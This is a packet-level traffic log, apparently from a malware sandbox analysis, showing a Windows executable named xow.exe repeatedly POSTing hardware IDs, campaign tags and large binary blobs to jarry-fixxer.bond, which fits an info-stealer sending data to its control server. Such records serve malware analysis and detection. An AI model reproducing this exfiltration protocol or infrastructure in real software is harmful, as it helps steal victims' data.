3d3eN6LMZxkCzMdlVdJNwSnXORCJzXC3Eu7nT++J0KzsFsaz4jyz/HbcRwXFEs3h2eOdZDl8RPJWfEVcq/uTGK0ih0fSfIcJAliD0QXjuYTNIWyEOVyQs2INgTzLb8aM7SK3R4Ict+mSXNe1RYJd4XnTfaSZTLRydkwFLHsbM7i55sMnk8hyffHMtlR0kvmAvcKp9Pl48TaW/TWcG0uT+L3S11cyLLdZYlznxZSyDUGpU900aWxUgkLo8TzKL
2025-01-22 11:24:04 UTC	1369	IN	Data Raw: 69 6c 39 65 44 62 4c 63 59 30 6f 32 6d 45 51 46 32 50 66 44 4e 4a 72 6e 33 36 63 33 31 73 71 4c 50 42 46 79 4b 79 33 50 59 4b 65 50 54 78 6e 5a 4d 42 7a 33 33 57 49 64 56 39 51 49 4e 63 56 6d 7a 2f 53 54 5a 4c 4b 53 69 39 71 79 31 6e 4c 76 4c 6f 78 69 39 51 68 63 33 51 74 77 48 65 59 4c 74 6f 7a 48 68 6b 6b 77 46 54 4b 63 2f 5a 50 69 63 46 62 61 58 47 50 53 6f 75 39 73 48 44 57 6e 69 5a 34 63 53 44 41 63 35 6b 6f 7a 6e 35 52 56 69 4c 59 47 35 59 34 31 6b 36 61 77 6b 34 6b 61 74 4e 5a 77 4c 57 77 4f 59 4c 54 59 6a 77 2b 49 39 38 2f 78 32 33 35 66 6c 35 58 4a 4d 35 55 6a 58 33 47 43 4a 7a 44 43 33 45 75 77 46 2f 45 75 62 4d 7a 6a 64 38 6f 59 47 77 6f 7a 6e 65 61 49 63 4e 39 56 6b 73 6c 31 78 32 52 4d 4e 5a 50 6b 38 4e 42 4b 6d 6d 42 48 59 75 39 70 48 44 57 Data Ascii: il9eDbLcY0o2mEQF2PfDNJrn36c31sqLPBFyKy3PYKePTxnZMBz33WIdV9QINcVmz/STZLKSi9qy1nLvLoxi9Qhc3QtwHeYLtozHhkkwFTKc/ZPicFbaXGPSou9sHDWniZ4cSDAc5kozn5RViLYG5Y41k6awk4katNZwLWwOYLTYjw+I98/x235fl5XJM5UjX3GCJzDC3EuwF/EubMzjd8oYGwozneaIcN9Vksl1x2RMNZPk8NBKmmBHYu9pHDW
2025-01-22 11:24:04 UTC	1369	IN	Data Raw: 64 6b 77 48 50 66 64 59 68 31 57 56 38 6b 33 68 71 41 4e 74 6c 48 6c 4d 5a 43 4c 57 62 43 55 38 2b 2b 75 7a 57 4e 30 69 6c 31 66 53 76 44 64 70 45 6b 78 7a 4d 65 47 53 54 41 56 4d 70 7a 2f 6c 4f 59 77 30 5a 70 63 59 39 4b 69 37 32 77 63 4e 61 65 4c 6e 78 37 4a 4d 31 35 6d 79 6a 4f 65 56 56 5a 4b 4e 73 62 6c 6a 58 62 52 35 76 45 51 69 68 6f 78 46 6e 41 76 4c 45 7a 69 4e 68 69 50 44 34 6a 33 7a 2f 48 62 65 68 6f 58 56 55 6b 6d 41 76 63 4b 70 39 50 6c 34 38 54 61 57 58 4e 56 38 79 36 73 54 4f 47 32 79 5a 34 65 79 54 50 62 5a 63 74 7a 32 46 43 57 53 72 64 47 4a 45 7a 32 30 36 53 79 55 67 74 4c 6f 38 54 7a 4b 4c 38 61 4d 37 7a 4c 6e 56 58 49 39 77 2f 67 47 50 52 4d 31 64 56 59 34 42 55 6b 7a 6a 56 52 35 62 4d 54 53 70 6c 78 46 6e 4b 76 62 51 39 6e 4e 30 74 66 Data Ascii: dkwHPfdYh1WV8k3hqANtlHlMZCLWbCU8++uzWN0il1fSvDdpEkxzMeGSTAVMpz/lOYw0ZpcY9Ki72wcNaeLnx7JM15myjOeVVZKNsbljXbR5vEQihoxFnAvLEziNhiPD4j3z/HbehoXVUkmAvcKp9Pl48TaWXNV8y6sTOG2yZ4eyTPbZctz2FCWSrdGJEz206SyUgtLo8TzKL8aM7zLnVXI9w/gGPRM1dVY4BUkzjVR5bMTSplxFnKvbQ9nN0tf
2025-01-22 11:24:04 UTC	1369	IN	Data Raw: 2f 78 32 32 50 63 45 4a 4c 4a 64 73 43 6b 58 54 68 64 72 7a 5a 51 53 35 2b 78 6b 54 45 2b 76 4a 77 67 5a 35 36 53 7a 34 74 77 47 53 4f 4f 38 56 6a 56 78 6b 63 6c 6c 53 4b 63 34 63 49 72 73 78 46 4a 32 6e 58 51 6f 61 64 71 6a 71 4a 7a 69 56 6c 63 57 53 4a 50 35 6c 74 6b 43 41 65 47 53 66 4a 56 4d 70 6a 6a 52 50 4f 6e 42 78 35 50 4e 34 64 30 76 71 71 63 4e 61 4d 62 44 4a 73 5a 4a 38 2f 32 43 37 61 59 56 5a 61 4e 64 74 54 72 41 33 34 55 70 62 4a 58 44 68 51 2f 31 54 52 74 37 6f 6e 6e 35 49 33 63 58 41 71 77 47 6e 66 59 34 68 38 45 41 45 61 6d 46 7a 53 44 4a 45 49 67 34 38 54 61 56 76 43 58 63 57 39 71 69 48 44 2b 54 68 2f 65 44 50 57 50 39 46 74 7a 6a 4d 49 43 32 32 59 45 49 4e 7a 68 78 6a 4a 6c 42 35 36 4f 5a 45 42 31 50 53 6c 63 4a 69 65 65 69 41 77 5a 4e Data Ascii: /x22PcEJLJdsCkXThdrzZQS5+xkTE+vJwgZ56Sz4twGSOO8VjVxkcllSKc4cIrsxFJ2nXQoadqjqJziVlcWSJP5ltkCAeGSfJVMpjjRPOnBx5PN4d0vqqcNaMbDJsZJ8/2C7aYVZaNdtTrA34UpbJXDhQ/1TRt7onn5I3cXAqwGnfY4h8EAEamFzSDJEIg48TaVvCXcW9qiHD+Th/eDPWP9FtzjMIC22YEINzhxjJlB56OZEB1PSlcJieeiAwZN
2025-01-22 11:24:04 UTC	1369	IN	Data Raw: 2f 58 42 65 56 79 54 4f 42 64 38 62 2f 48 4b 68 6a 57 63 75 65 34 4e 6e 7a 4b 71 74 4f 34 50 53 59 6a 77 2b 49 6f 63 6e 7a 32 4f 49 64 30 45 5a 65 34 68 47 79 57 61 4d 48 38 75 64 56 47 64 33 67 55 57 4c 34 75 35 2b 7a 73 78 69 4b 6a 35 6a 78 47 32 4e 4b 38 74 6c 55 78 34 64 35 6a 4f 63 4e 4e 35 65 69 39 68 45 46 31 44 55 55 4d 57 30 75 79 61 66 6e 6d 77 79 63 57 53 66 52 74 39 6c 69 45 77 65 47 54 75 59 54 4e 49 47 33 45 61 56 79 46 30 34 49 2b 5a 64 7a 4c 75 71 49 4a 6e 52 59 6a 77 2b 49 6f 63 6e 7a 57 4f 49 64 30 45 5a 65 34 68 47 79 57 61 4d 48 38 75 64 56 47 64 33 67 55 57 4c 34 75 35 2b 7a 73 78 69 4b 6a 35 6a 78 47 32 4e 4b 38 74 6c 55 78 34 64 35 6a 4f 63 4e 4e 35 65 69 39 68 45 5a 6b 44 33 63 76 57 45 71 54 4f 41 30 43 56 6b 62 32 53 4a 50 35 42 Data Ascii: /XBeVyTOBd8b/HKhjWcue4NnzKqtO4PSYjw+Iocnz2OId0EZe4hGyWaMH8udVGd3gUWL4u5+zsxiKj5jxG2NK8tlUx4d5jOcNN5ei9hEF1DUUMW0uyafnmwycWSfRt9liEweGTuYTNIG3EaVyF04I+ZdzLuqIJnRYjw+IocnzWOId0EZe4hGyWaMH8udVGd3gUWL4u5+zsxiKj5jxG2NK8tlUx4d5jOcNN5ei9hEZkD3cvWEqTOA0CVkb2SJP5B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	104.21.78.5	443	7392	C:\Users\user\Desktop\xow.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:24:05 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NE23V588HHSFGFNP2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18156 Host: jarry-fixxer.bond
2025-01-22 11:24:05 UTC	15331	OUT	Data Raw: 2d 2d 4e 45 32 33 56 35 38 38 48 48 53 46 47 46 4e 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 33 34 41 39 32 45 38 33 30 31 36 30 35 45 37 39 46 45 37 41 41 35 35 31 34 37 43 36 43 30 0d 0a 2d 2d 4e 45 32 33 56 35 38 38 48 48 53 46 47 46 4e 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 45 32 33 56 35 38 38 48 48 53 46 47 46 4e 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 52 49 49 49 0d 0a 2d 2d Data Ascii: --NE23V588HHSFGFNP2Content-Disposition: form-data; name="hwid"9434A92E8301605E79FE7AA55147C6C0--NE23V588HHSFGFNP2Content-Disposition: form-data; name="pid"2--NE23V588HHSFGFNP2Content-Disposition: form-data; name="lid"c2CoW0--RIII--
2025-01-22 11:24:05 UTC	2825	OUT	Data Raw: eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 Data Ascii: JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
2025-01-22 11:24:14 UTC	1137	IN	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 11:24:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cdo02jc028l2jq1iqlo1jqrv2t; expires=Sun, 18 May 2025 05:10:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ZG8yCxlVsEH5Rc812w9Co%2Fhzl%2FdMV7GP3VtR396HI5FNOtKB8QN7QXgT7rWkfoR5W3Lw%2BWWJvFeDVOt6LHj9bqsHLCuHN%2FDa4lfKERZ6PRx5zlMzuHWIyuKqjcLqb%2Bv8tcQ5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 905f2cf67ce8c5c4-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7195&min_rtt=7153&rtt_var=2712&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19118&delivery_rate=408220&cwnd=32&unsent_bytes=0&cid=711f6b4d9ea90973&ts=8965&x=0"
2025-01-22 11:24:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-22 11:24:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.21.78.5	443	7392	C:\Users\user\Desktop\xow.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:24:14 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=604W9BUJBKV27J9X1T User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8783 Host: jarry-fixxer.bond
2025-01-22 11:24:14 UTC	8783	OUT	Data Raw: 2d 2d 36 30 34 57 39 42 55 4a 42 4b 56 32 37 4a 39 58 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 33 34 41 39 32 45 38 33 30 31 36 30 35 45 37 39 46 45 37 41 41 35 35 31 34 37 43 36 43 30 0d 0a 2d 2d 36 30 34 57 39 42 55 4a 42 4b 56 32 37 4a 39 58 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 30 34 57 39 42 55 4a 42 4b 56 32 37 4a 39 58 31 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 52 49 49 49 0d Data Ascii: --604W9BUJBKV27J9X1TContent-Disposition: form-data; name="hwid"9434A92E8301605E79FE7AA55147C6C0--604W9BUJBKV27J9X1TContent-Disposition: form-data; name="pid"2--604W9BUJBKV27J9X1TContent-Disposition: form-data; name="lid"c2CoW0--RIII
2025-01-22 11:24:15 UTC	1132	IN	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 11:24:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mkokdkbjs2s4m1qhqvotrn6f32; expires=Sun, 18 May 2025 05:10:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Akdlzpk7Tug2eJJDySeRSmlFr%2FSzPZW6LmzuO5IyoOoJbi2%2BLxDAMbh3gYiO5ycgOVGWY%2FOObfd8bvVJKX9LrkGkaEZnktkLHoxQbzaLk1l4yiCPxKL%2Fd7ogVWT4hiWjdYdVvQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 905f2d31a95282da-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7110&min_rtt=7105&rtt_var=2674&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9723&delivery_rate=408620&cwnd=32&unsent_bytes=0&cid=dbf5c9a4227954f4&ts=738&x=0"
2025-01-22 11:24:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-22 11:24:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	104.21.78.5	443	7392	C:\Users\user\Desktop\xow.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:24:16 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Y4ECS4S8YPTW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20400 Host: jarry-fixxer.bond
2025-01-22 11:24:16 UTC	15331	OUT	Data Raw: 2d 2d 59 34 45 43 53 34 53 38 59 50 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 33 34 41 39 32 45 38 33 30 31 36 30 35 45 37 39 46 45 37 41 41 35 35 31 34 37 43 36 43 30 0d 0a 2d 2d 59 34 45 43 53 34 53 38 59 50 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 59 34 45 43 53 34 53 38 59 50 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 52 49 49 49 0d 0a 2d 2d 59 34 45 43 53 34 53 38 59 50 54 57 0d 0a 43 Data Ascii: --Y4ECS4S8YPTWContent-Disposition: form-data; name="hwid"9434A92E8301605E79FE7AA55147C6C0--Y4ECS4S8YPTWContent-Disposition: form-data; name="pid"3--Y4ECS4S8YPTWContent-Disposition: form-data; name="lid"c2CoW0--RIII--Y4ECS4S8YPTWC
2025-01-22 11:24:16 UTC	5069	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b Data Ascii: lrQMn 64F6(X&7~`aO
2025-01-22 11:24:17 UTC	1136	IN	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 11:24:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qiaq2q0n65mmm9pr44q7l9lm8v; expires=Sun, 18 May 2025 05:10:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e2x8dAn6T9bu969JFgECOGxFOtD08ipYBmXb9tDI7%2Fv2%2BcUYe0FcsQBm%2BJf%2F5ICt9mbzt0IvaRwvtchBrUcPFX5CYjHbwPPV9D6ugMgs2yhTbYybE3JdbrtVtqP4BQHcpaKS3A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 905f2d3c28d5970c-AMS alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=77256&min_rtt=77243&rtt_var=28993&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21357&delivery_rate=37749&cwnd=32&unsent_bytes=0&cid=9ace64d3f8eed56e&ts=629&x=0"
2025-01-22 11:24:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-22 11:24:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49737	104.21.78.5	443	7392	C:\Users\user\Desktop\xow.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:24:18 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=I3M4RUPXRWRD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2572 Host: jarry-fixxer.bond
2025-01-22 11:24:18 UTC	2572	OUT	Data Raw: 2d 2d 49 33 4d 34 52 55 50 58 52 57 52 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 33 34 41 39 32 45 38 33 30 31 36 30 35 45 37 39 46 45 37 41 41 35 35 31 34 37 43 36 43 30 0d 0a 2d 2d 49 33 4d 34 52 55 50 58 52 57 52 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 33 4d 34 52 55 50 58 52 57 52 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 52 49 49 49 0d 0a 2d 2d 49 33 4d 34 52 55 50 58 52 57 52 44 0d 0a 43 Data Ascii: --I3M4RUPXRWRDContent-Disposition: form-data; name="hwid"9434A92E8301605E79FE7AA55147C6C0--I3M4RUPXRWRDContent-Disposition: form-data; name="pid"1--I3M4RUPXRWRDContent-Disposition: form-data; name="lid"c2CoW0--RIII--I3M4RUPXRWRDC
2025-01-22 11:24:20 UTC	1130	IN	HTTP/1.1 200 OK Date: Wed, 22 Jan 2025 11:24:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=20ub2in9gpuiujk7bkjrn1vjn0; expires=Sun, 18 May 2025 05:10:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciLSaKAsWgFNquHY2gefH0whTU9xusoU50hTzRixVzC8h9DErhhdPrClqZK%2B3Q3Nrih9tewAkvDCiHSXwsb66fz4h6%2FXRE7cHIgoanGBQRbTH6gna4QQohhEpgQ6rD8%2Fzh1f8w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 905f2d49cea681ee-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7697&min_rtt=7500&rtt_var=2953&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=3484&delivery_rate=389333&cwnd=32&unsent_bytes=0&cid=59a7ef7d3538e86f&ts=2368&x=0"
2025-01-22 11:24:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-22 11:24:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.78.5	443	7392	C:\Users\user\Desktop\xow.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:24:21 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5O5EWST27SRODKZO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587204 Host: jarry-fixxer.bond
2025-01-22 11:24:21 UTC	15331	OUT	Data Raw: 2d 2d 35 4f 35 45 57 53 54 32 37 53 52 4f 44 4b 5a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 33 34 41 39 32 45 38 33 30 31 36 30 35 45 37 39 46 45 37 41 41 35 35 31 34 37 43 36 43 30 0d 0a 2d 2d 35 4f 35 45 57 53 54 32 37 53 52 4f 44 4b 5a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4f 35 45 57 53 54 32 37 53 52 4f 44 4b 5a 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 52 49 49 49 0d 0a 2d 2d 35 4f 35 Data Ascii: --5O5EWST27SRODKZOContent-Disposition: form-data; name="hwid"9434A92E8301605E79FE7AA55147C6C0--5O5EWST27SRODKZOContent-Disposition: form-data; name="pid"1--5O5EWST27SRODKZOContent-Disposition: form-data; name="lid"c2CoW0--RIII--5O5
2025-01-22 11:24:21 UTC	15331	OUT	Data Raw: 1a ed d0 0e 58 31 67 b3 af d2 2e 02 1b ad a8 95 fd d0 63 d4 3b ed cc ce 27 2e b1 2a 48 af ab 7e fb ff 36 18 21 97 6b 80 fe a1 15 cc e0 40 8c 09 35 97 8d 14 9c 20 10 61 1a d6 1a a3 b1 1e f1 ac 3c 8a a7 08 6a 73 37 25 f0 60 24 bc c5 43 b1 6f b3 84 98 07 25 bb 05 80 4d 62 ba bd 1b 0e 34 ca 2d 5c 31 41 47 89 3c b7 2f 81 64 95 61 aa c8 76 91 06 cd 7b e3 53 4a 48 ec 17 63 96 50 87 24 dd 61 13 8a 1c 1c 88 7f f9 7b 5c 99 3b a1 19 47 ad 34 93 51 ef 87 a5 bb 8a 80 a5 0b 77 b2 a8 18 53 78 1e 33 47 49 dd 6a f4 75 96 63 d7 39 10 36 89 2b 72 d5 1b 75 26 23 3e b6 d2 54 32 33 03 0b 8b 2f 6b 4c bd 5d 02 de 7b 68 5a 68 7f 3e 30 f9 13 bd b0 41 08 30 7a 60 1e 58 24 67 0d 91 47 ea 6a be 26 7e e5 8e 18 bb be eb 27 f1 ce bf 4f d0 e0 89 45 6d 7d 10 4c 3a cd c4 90 dd 36 9e 26 5b Data Ascii: X1g.c;'.*H~6!k@5 a<js7%`$Co%Mb4-\1AG</dav{SJHcP$a{\;G4QwSx3GIjuc96+ru&#>T23/kL]{hZh>0A0z`X$gGj&~'OEm}L:6&[
